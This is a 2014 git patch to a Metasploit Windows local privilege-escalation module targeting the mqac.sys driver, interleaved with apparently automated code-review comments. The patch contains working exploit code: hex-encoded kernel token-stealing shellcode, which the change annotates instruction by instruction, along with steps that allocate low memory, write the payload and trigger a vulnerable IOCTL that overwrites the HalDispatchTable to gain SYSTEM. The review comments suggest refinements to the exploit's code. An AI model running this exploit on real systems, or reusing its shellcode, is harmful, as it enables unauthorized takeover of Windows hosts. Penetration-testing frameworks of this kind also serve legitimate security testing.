From 7f79e58e7fcaa07459ec491cc7dc701768550c6f Mon Sep 17 00:00:00 2001
From: Spencer McIntyre
Date: Tue, 22 Jul 2014 14:45:00 -0400
Subject: [PATCH] Lots and cleanups based on PR feed back
---
 modules/exploits/windows/local/mqac_write.rb | 51 ++++++++++----------
 1 file changed, 26 insertions(+), 25 deletions(-)
diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
index 6a7fefdf3c..e878c18323 100644
--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -83,12 +83,13 @@ class Metasploit3 < Msf::Exploit::Local
     local_sys = resolve_sid("S-1-5-18")
     system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
+    this_pid = session.sys.process.getpid
     # Processes that can Blue Screen a host if migrated in to
     dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
     session.sys.process.processes.each do |p|
       # Check we are not migrating to a process that can BSOD the host
       next if dangerous_processes.include?(p["name"])
-      next if p["pid"] == session.sys.process.getpid
+      next if p["pid"] == this_pid
       next if p["pid"] == 4
       next if p["user"] != system_account_name
       return p
@@ -136,7 +137,6 @@ class Metasploit3 < Msf::Exploit::Local
       return
     end
 
-    this_proc = session.sys.process.open
     kernel_info = find_sys_base(nil)
     base_addr = 0xffff
     print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
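Review bot: `next if p["pid"] == 4` in the migration filter skips a process by a bare magic number, and the only explanation on this page is a shellcode comment many lines later ("Compares UniqueProcessId with 4 (The System Process on Windows XP)"). A comment on the line itself would keep the filter self-explanatory, e.g. `next if p["pid"] == 4 # PID 4 is the System process; never migrate into it`. Hoisting `getpid` into `this_pid` before the loop is a sound change; note that the enclosing method starts before this hunk, so what it returns when no process passes the filter is not visible here.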
@@ -144,11 +144,13 @@ class Metasploit3 < Msf::Exploit::Local handle = open_device return if handle.nil? - if not this_proc.memory.writable?(base_addr) - result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE") + this_proc = session.sys.process.open + unless this_proc.memory.writable?(base_addr) + session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE") end - if not this_proc.memory.writable?(base_addr) + unless this_proc.memory.writable?(base_addr) print_error('Failed to properly allocate memory') + this_proc.close return end 
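Review bot: The allocation-failure path now closes `this_proc` but still returns with the device handle from `open_device` (two lines above) open, unless open_device registers it for cleanup somewhere not shown. If the success path closes `handle` (that close is outside this hunk), mirror it here before the `return`; the cleaner option is to open both handles inside a `begin`/`ensure` so every exit releases them, which would also make the separate `this_proc.close` lines in this and the next hunk unnecessary. The status returned by `NtAllocateVirtualMemory` is now discarded; the `writable?` re-check covers the outcome, but keeping `result = ` and including it in the `print_error` message would make a failed allocation diagnosable instead of a bare 'Failed to properly allocate memory'. The enclosing method starts before and ends after this hunk.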
@@ -160,34 +162,33 @@ class Metasploit3 < Msf::Exploit::Local halDispatchTable += kernel_info[0] print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}") - tokenstealing = "\x31\xc0" - tokenstealing << "\x52" - tokenstealing << "\x53" - tokenstealing << "\x33\xc0" - tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" - tokenstealing << "\x8b\x40" + target['_KPROCESS'] - tokenstealing << "\x8b\xc8" - tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00" - tokenstealing << "\x89\x1d\x00\x09\x02\x00" - tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00" - tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00" - tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" - tokenstealing << "\x75\xe8" - tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00" - tokenstealing << "\x8b\xc1" - tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00" - tokenstealing << "\x5b" - tokenstealing << "\x5a" - tokenstealing << "\xc2\x10" + tokenstealing = "\x52" # push edx # Save edx on the stack + tokenstealing << "\x53" # push ebx # Save ebx on the stack + tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0 + tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD + tokenstealing << "\x8b\x40" + target['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS + tokenstealing << "\x8b\xc8" # mov ecx, eax + tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN + tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks + tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks + tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The 
System Process on Windows XP) + tokenstealing << "\x75\xe8" # jne 0000101e ====================== + tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX + tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX + tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS + tokenstealing << "\x5b" # pop ebx # Restores ebx + tokenstealing << "\x5a" # pop edx # Restores edx + tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel! shellcode = make_nops(0x200) + tokenstealing this_proc.memory.write(0x1, shellcode) + this_proc.close print_status("Triggering vulnerable IOCTL") session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0) result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) - if not is_system? + unless is_system? print_error("Exploit failed") return end
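Review bot: The new per-instruction comments hard-code offsets (`[eax+44h]`, `[eax+0C8h]`, `[eax+88h]`, `[eax+84h]`) that the code actually reads from `target['_KPROCESS']`, `target['_TOKEN']`, `target['_APLINKS']` and `target['_UPID']`, so they are correct for one target only and will silently go stale as targets are added. Phrase them in terms of the key, e.g. `# mov eax, dword ptr [eax+_KPROCESS]` and `# mov ebx, dword ptr [eax+_TOKEN]`, and likewise the `jne 0000101e` comment, which names an absolute address for what is a relative backward jump to the ActiveProcessLinks walk (`# jne back to the FLINK load`). The `this_proc.close` added after `memory.write` is skipped if the write raises; since this_proc is opened in an earlier hunk, an `ensure` at method level (outside this hunk) would cover that path. The enclosing method continues past the end of this hunk.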